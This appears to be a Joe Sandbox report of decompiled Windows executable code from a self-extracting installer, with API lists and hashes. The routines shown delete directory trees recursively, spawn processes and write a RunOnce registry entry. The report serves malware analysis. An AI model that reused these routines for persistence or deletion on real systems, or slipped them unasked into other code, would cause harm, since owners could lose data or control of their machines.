                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              				int _t36;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                              				_t21 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_t65 = __ecx;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_pop(_t62);
                                                                                                                                                                                                                                              					_pop(_t66);
                                                                                                                                                                                                                                              					_pop(_t46);
                                                                                                                                                                                                                                              					return E00976CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E00971680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                              					_t58 = 0x104;
                                                                                                                                                                                                                                              					E009716B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                              					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                              					_t63 = _t22;
                                                                                                                                                                                                                                              					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t58 = 0x104;
                                                                                                                                                                                                                                              						E00971680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                              						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							_t58 = 0x104;
                                                                                                                                                                                                                                              							E009716B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                              							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                              							DeleteFileA( &_v280);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                              								E009716B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                              								_t58 = 0x104;
                                                                                                                                                                                                                                              								E0097658A( &_v280, 0x104, 0x971140);
                                                                                                                                                                                                                                              								E00972390( &_v284);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                              					} while (_t36 != 0);
                                                                                                                                                                                                                                              					FindClose(_t63); // executed
                                                                                                                                                                                                                                              					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





















                                                                                                                                                                                                                                              0x00972398
                                                                                                                                                                                                                                              0x0097239e
                                                                                                                                                                                                                                              0x009723a3
                                                                                                                                                                                                                                              0x009723a5
                                                                                                                                                                                                                                              0x009723ae
                                                                                                                                                                                                                                              0x009723b3
                                                                                                                                                                                                                                              0x009724cb
                                                                                                                                                                                                                                              0x009724d2
                                                                                                                                                                                                                                              0x009724d3
                                                                                                                                                                                                                                              0x009724d4
                                                                                                                                                                                                                                              0x009724df
                                                                                                                                                                                                                                              0x009723c2
                                                                                                                                                                                                                                              0x009723d1
                                                                                                                                                                                                                                              0x009723db
                                                                                                                                                                                                                                              0x009723e4
                                                                                                                                                                                                                                              0x009723f6
                                                                                                                                                                                                                                              0x009723fc
                                                                                                                                                                                                                                              0x00972401
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972407
                                                                                                                                                                                                                                              0x00972407
                                                                                                                                                                                                                                              0x00972408
                                                                                                                                                                                                                                              0x00972411
                                                                                                                                                                                                                                              0x0097241f
                                                                                                                                                                                                                                              0x0097247a
                                                                                                                                                                                                                                              0x00972483
                                                                                                                                                                                                                                              0x00972495
                                                                                                                                                                                                                                              0x009724a3
                                                                                                                                                                                                                                              0x00972421
                                                                                                                                                                                                                                              0x0097242f
                                                                                                                                                                                                                                              0x00972453
                                                                                                                                                                                                                                              0x0097245d
                                                                                                                                                                                                                                              0x00972466
                                                                                                                                                                                                                                              0x00972472
                                                                                                                                                                                                                                              0x00972472
                                                                                                                                                                                                                                              0x0097242f
                                                                                                                                                                                                                                              0x009724af
                                                                                                                                                                                                                                              0x009724b5
                                                                                                                                                                                                                                              0x009724be
                                                                                                                                                                                                                                              0x009724c5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009724c5

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,00978A3A,009711F4,00978A3A,00000000,?,?), ref: 009723F6
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,009711F8), ref: 00972427
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,009711FC), ref: 0097243B
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00972495
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 009724A3
                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 009724AF
                                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 009724BE
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(00978A3A), ref: 009724C5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836429354-0
                                                                                                                                                                                                                                              • Opcode ID: ac2edc92634f18bc8061a3c81b442d2bae0f583b7af929dd4dd8e6efd5308e66
                                                                                                                                                                                                                                              • Instruction ID: d67da53f1eb5d7136005edce6215ec5154a25b3324c56a98849d952f833f7112
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac2edc92634f18bc8061a3c81b442d2bae0f583b7af929dd4dd8e6efd5308e66
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E3184336187409BD320EB68CC89BEF73ECABC5315F048D2DB59D86290EB349949C752
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 675 973fef-974010 676 974016-97403b CreateProcessA 675->676 677 97410a-97411a call 976ce0 675->677 678 9740c4-974101 call 976285 GetLastError FormatMessageA call 9744b9 676->678 679 974041-97406e WaitForSingleObject GetExitCodeProcess 676->679 693 974106 678->693 682 974091 call 97411b 679->682 683 974070-974077 679->683 688 974096-9740b8 CloseHandle * 2 682->688 683->682 686 974079-97407b 683->686 686->682 690 97407d-974089 686->690 691 9740ba-9740c0 688->691 692 974108 688->692 690->682 694 97408b 690->694 691->692 695 9740c2 691->695 692->677 693->692 694->682 695->693
                                                                                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                                                                                              			E00973FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v524;
                                                                                                                                                                                                                                              				long _v528;
                                                                                                                                                                                                                                              				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t20;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t45 = __edx;
                                                                                                                                                                                                                                              				_t20 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                              				_t39 = __ecx;
                                                                                                                                                                                                                                              				_t49 = 1;
                                                                                                                                                                                                                                              				_t22 = 0;
                                                                                                                                                                                                                                              				if(__ecx == 0) {
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return E00976CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                              					_t45 = 0x4c4;
                                                                                                                                                                                                                                              					E009744B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					_t49 = 0;
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t22 = _t49;
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                              				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                              				_t44 = _v528;
                                                                                                                                                                                                                                              				_t53 =  *0x978a28; // 0x0
                                                                                                                                                                                                                                              				if(_t53 == 0) {
                                                                                                                                                                                                                                              					_t34 =  *0x979a2c; // 0x0
                                                                                                                                                                                                                                              					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                              						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                              							 *0x979a2c = _t44;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E0097411B(_t34, _t44);
                                                                                                                                                                                                                                              				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                              				CloseHandle(_v544);
                                                                                                                                                                                                                                              				if(( *0x979a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00973fef
                                                                                                                                                                                                                                              0x00973ffa
                                                                                                                                                                                                                                              0x00974001
                                                                                                                                                                                                                                              0x00974008
                                                                                                                                                                                                                                              0x0097400a
                                                                                                                                                                                                                                              0x0097400b
                                                                                                                                                                                                                                              0x00974010
                                                                                                                                                                                                                                              0x0097410a
                                                                                                                                                                                                                                              0x0097411a
                                                                                                                                                                                                                                              0x0097411a
                                                                                                                                                                                                                                              0x0097401c
                                                                                                                                                                                                                                              0x0097401d
                                                                                                                                                                                                                                              0x0097401e
                                                                                                                                                                                                                                              0x0097401f
                                                                                                                                                                                                                                              0x00974033
                                                                                                                                                                                                                                              0x0097403b
                                                                                                                                                                                                                                              0x009740ca
                                                                                                                                                                                                                                              0x009740e9
                                                                                                                                                                                                                                              0x009740f8
                                                                                                                                                                                                                                              0x00974101
                                                                                                                                                                                                                                              0x00974106
                                                                                                                                                                                                                                              0x00974106
                                                                                                                                                                                                                                              0x00974108
                                                                                                                                                                                                                                              0x00974108
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974108
                                                                                                                                                                                                                                              0x00974049
                                                                                                                                                                                                                                              0x0097405c
                                                                                                                                                                                                                                              0x00974062
                                                                                                                                                                                                                                              0x00974068
                                                                                                                                                                                                                                              0x0097406e
                                                                                                                                                                                                                                              0x00974070
                                                                                                                                                                                                                                              0x00974077
                                                                                                                                                                                                                                              0x0097407f
                                                                                                                                                                                                                                              0x00974089
                                                                                                                                                                                                                                              0x0097408b
                                                                                                                                                                                                                                              0x0097408b
                                                                                                                                                                                                                                              0x00974089
                                                                                                                                                                                                                                              0x00974077
                                                                                                                                                                                                                                              0x00974091
                                                                                                                                                                                                                                              0x0097409c
                                                                                                                                                                                                                                              0x009740a8
                                                                                                                                                                                                                                              0x009740b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009740c2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009740c2

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateProcessA.KERNELBASE ref: 00974033
                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00974049
                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNELBASE ref: 0097405C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0097409C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 009740A8
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 009740DC
                                                                                                                                                                                                                                              • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 009740E9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3183975587-0
                                                                                                                                                                                                                                              • Opcode ID: 873d1e743cd8b881b8554c0ac1c43340cf5b1c4fb71148e105c676b46dd7a0a9
                                                                                                                                                                                                                                              • Instruction ID: d1615619641f5b696784a5f1df48895a83d03e49fa770367be7840a19f358a07
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873d1e743cd8b881b8554c0ac1c43340cf5b1c4fb71148e105c676b46dd7a0a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E31BC33659208ABEB209B65DC48FAB777CEBD5711F1081A9F60DD21A2CB304CC1DB21
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                                                                                              			E00972BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t7;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				signed char _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				void* _t24;
                                                                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t4 = GetVersion();
                                                                                                                                                                                                                                              				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                              					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t17 = _t21;
                                                                                                                                                                                                                                              							 *0x97a288(0, 1, 0, 0);
                                                                                                                                                                                                                                              							 *_t21();
                                                                                                                                                                                                                                              							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                              							if(_t24 != _t24) {
                                                                                                                                                                                                                                              								_t17 = 4;
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t20 = _a12;
                                                                                                                                                                                                                                              				_t18 = _a4;
                                                                                                                                                                                                                                              				 *0x979124 = 0;
                                                                                                                                                                                                                                              				if(E00972CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                              					_t9 = E00972F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                              					_t22 = _t9; // executed
                                                                                                                                                                                                                                              					E009752B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                              					if(_t22 != 0) {
                                                                                                                                                                                                                                              						_t32 =  *0x978a3a; // 0x0
                                                                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                                                                              							_t19 =  *0x979a2c; // 0x0
                                                                                                                                                                                                                                              							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              								E00971F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t6 =  *0x978588; // 0x0
                                                                                                                                                                                                                                              				if(_t6 != 0) {
                                                                                                                                                                                                                                              					CloseHandle(_t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 =  *0x979124; // 0x80070002
                                                                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00972c03
                                                                                                                                                                                                                                              0x00972c0d
                                                                                                                                                                                                                                              0x00972c18
                                                                                                                                                                                                                                              0x00972c20
                                                                                                                                                                                                                                              0x00972c2e
                                                                                                                                                                                                                                              0x00972c32
                                                                                                                                                                                                                                              0x00972c36
                                                                                                                                                                                                                                              0x00972c3d
                                                                                                                                                                                                                                              0x00972c43
                                                                                                                                                                                                                                              0x00972c45
                                                                                                                                                                                                                                              0x00972c47
                                                                                                                                                                                                                                              0x00972c49
                                                                                                                                                                                                                                              0x00972c4e
                                                                                                                                                                                                                                              0x00972c4e
                                                                                                                                                                                                                                              0x00972c47
                                                                                                                                                                                                                                              0x00972c32
                                                                                                                                                                                                                                              0x00972c20
                                                                                                                                                                                                                                              0x00972c50
                                                                                                                                                                                                                                              0x00972c54
                                                                                                                                                                                                                                              0x00972c57
                                                                                                                                                                                                                                              0x00972c64
                                                                                                                                                                                                                                              0x00972c66
                                                                                                                                                                                                                                              0x00972c6b
                                                                                                                                                                                                                                              0x00972c6d
                                                                                                                                                                                                                                              0x00972c74
                                                                                                                                                                                                                                              0x00972c76
                                                                                                                                                                                                                                              0x00972c7c
                                                                                                                                                                                                                                              0x00972c7e
                                                                                                                                                                                                                                              0x00972c87
                                                                                                                                                                                                                                              0x00972c89
                                                                                                                                                                                                                                              0x00972c89
                                                                                                                                                                                                                                              0x00972c87
                                                                                                                                                                                                                                              0x00972c7c
                                                                                                                                                                                                                                              0x00972c74
                                                                                                                                                                                                                                              0x00972c8e
                                                                                                                                                                                                                                              0x00972c95
                                                                                                                                                                                                                                              0x00972c98
                                                                                                                                                                                                                                              0x00972c98
                                                                                                                                                                                                                                              0x00972c9e
                                                                                                                                                                                                                                              0x00972ca7

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersion.KERNEL32(?,00000002,00000000,?,00976BB0,00970000,00000000,00000002,0000000A), ref: 00972C03
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00976BB0,00970000,00000000,00000002,0000000A), ref: 00972C18
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00972C28
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00976BB0,00970000,00000000,00000002,0000000A), ref: 00972C98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                              • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                              • Opcode ID: 02965e6b5152e09b4700b718a3f84f49e0c7e071eebc72637586e7a3dba09184
                                                                                                                                                                                                                                              • Instruction ID: e9a7d0914b85ec1d4182782ba63af3736429f1db6484fc9ec441d408035d8ae6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02965e6b5152e09b4700b718a3f84f49e0c7e071eebc72637586e7a3dba09184
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E1125333383055BE7226BB6AC89B2F376DDBD4394B0C8065F88CD3251EA30DC819669
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00976F40() {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(E00976EF0); // executed
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x00976f45
                                                                                                                                                                                                                                              0x00976f4d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00976F45
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              • Opcode ID: 43df864b00c3d68b50c4eb33ff4bd3d619a2f842f1331c7c3816c69886d752c1
                                                                                                                                                                                                                                              • Instruction ID: 6419fa9fa035bfde65d9a6d47b6967c3158b92aaac233d9303cf3f833be5067b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43df864b00c3d68b50c4eb33ff4bd3d619a2f842f1331c7c3816c69886d752c1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE90026626950047A6501B749D1955975915ECD616BC19460A019C4494DB604490A522
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E0097202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				void* _v532;
                                                                                                                                                                                                                                              				int _v536;
                                                                                                                                                                                                                                              				int _v540;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				void _t56;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t72;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				intOrPtr* _t81;
                                                                                                                                                                                                                                              				void* _t86;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t90;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                                                                              				void* _t94;
                                                                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t79 = __edx;
                                                                                                                                                                                                                                              				_t28 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                              				_t84 = 0x104;
                                                                                                                                                                                                                                              				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                              				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                              				_t66 = 0;
                                                                                                                                                                                                                                              				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					L24:
                                                                                                                                                                                                                                              					return E00976CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(_t86);
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E0097171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                              					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                              					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                              					if(_t41 != 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
